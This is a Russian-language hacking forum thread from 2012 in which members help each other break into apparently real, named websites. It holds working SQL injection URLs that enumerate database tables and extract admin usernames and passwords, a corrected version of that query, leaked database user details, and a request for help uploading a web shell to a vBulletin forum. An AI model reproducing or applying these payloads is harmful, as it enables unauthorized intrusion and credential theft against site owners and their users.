HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.08.2012, 18:02
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами: 7712246

Репутация: 23
По умолчанию

Цитата:
Сообщение от InDuStRieS  
http://www.intim.dn.ua/catalog/vender.php?id=412'+order+by+10&meta_id=1790
Почему тут не работает?
Не выводит
блиндом выводится

5.0.51a-24+lenny5-log:intimLBj:u_intimLBj@localhost:debian-linux-gnu
 
Ответить с цитированием

  #2  
Старый 16.08.2012, 18:22
InDuStRieS
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
С нами: 9030789

Репутация: 704
По умолчанию

Цитата:
Сообщение от er9j6@  
блиндом выводится
5.0.51a-24+lenny5-log:intimLBj:u_intimLBj@localhost:debian-linux-gnu
Не со всем понятно,там же мускл ошибка выводиться..

В любом случае чтобы тут не флудить,просьба отписать в личку или в аську 564714

Готов финансово вознаградить,нужно обьяснить как ты вывел
 
Ответить с цитированием

  #3  
Старый 16.08.2012, 18:44
Dad69
Новичок
Регистрация: 16.10.2011
Сообщений: 11
С нами: 7670486

Репутация: 0
По умолчанию

Подскажите актуальные методы trace
 
Ответить с цитированием

  #4  
Старый 16.08.2012, 21:01
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от Dad69  
Подскажите актуальные методы trace
Эмм. Что ? Очередная порция хеккеров с Acunetix ?

Описание. Пункт 9.8

Применение в XSS
 
Ответить с цитированием

  #5  
Старый 17.08.2012, 19:02
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Dad69

Этот метод тебе ничего не даст, потому что сложно заставить браузер жертвы отослать запрос TRACE, он используется если в двух словах просто для отражения запроса обратно к клиенту, т.е. теоретически если бы ты смог заставить жертву отослать такой запрос, сервер вернул бы эту информацию назад, например куки жертвы.

Но не знаю на сегодняшний день позволяет ли хоть один браузер такое делать. Вот если бы там был рабочий метод PUT ))

Собственно BigBear дал ссылки на описание.
 
Ответить с цитированием

  #6  
Старый 17.08.2012, 21:10
sobvit
Новичок
Регистрация: 15.08.2012
Сообщений: 2
С нами: 7232726

Репутация: 0
По умолчанию

Подскажите, плиз, подобрал колонки, хочу вывести логин и пасс админа, но не получается.

Для таблиц

Цитата:
Сообщение от None  
http://www.mcguireprogramme.com/about_us.php?id=3-1.1+UNION+SELECT+1,table_name,3%20from%20informati on_schema.tables%20limit%2044,1%20--
Для колонок

Цитата:
Сообщение от None  
http://www.mcguireprogramme.com/about_us.php?id=3-1.1+UNION+SELECT+1,group_concat%28column_name%29,3 +from+information_schema.columns+where+table_name= 0x75736572--
Для вывода админа

Цитата:
Сообщение от None  
www.mcguireprogramme.com/about_us.php?id=3-1.1+UNION+SELECT+1,concat_ws(username,password),3 from+user+limit+1,1 --
Почему данные админа не выводятся?
 
Ответить с цитированием

  #7  
Старый 17.08.2012, 21:23
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами: 7854806

Репутация: 173


По умолчанию

Цитата:
Сообщение от sobvit  
Почему данные админа не выводятся?
Цитата:
Сообщение от None  
http://www.mcguireprogramme.com/about_us.php?id=3-1.1+UNION+SELECT+1,concat_ws%280x3a,username,passw ord%29,3%20from+crt_main.user+limit+0,1--
.....
 
Ответить с цитированием

  #8  
Старый 17.08.2012, 21:36
sobvit
Новичок
Регистрация: 15.08.2012
Сообщений: 2
С нами: 7232726

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
.....
А почему надо использовать такую конструкцию записи (crt_main.user) ?
 
Ответить с цитированием

  #9  
Старый 17.08.2012, 21:38
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от sobvit  
А почему надо использовать такую конструкцию записи (crt_main.user) ?
потому что таблица в другой базе, читайте учебники , дальше буду удалять
 
Ответить с цитированием

  #10  
Старый 18.08.2012, 16:37
MaxFast
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами: 7676246

Репутация: 94


По умолчанию

Пытаюсь залить шелл в vBulletin 3.1.0 с помощью XML шелла.

Тут при загрузке происходит ошибка "XML Error: Reserved XML Name at Line 1".

В чем проблема?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.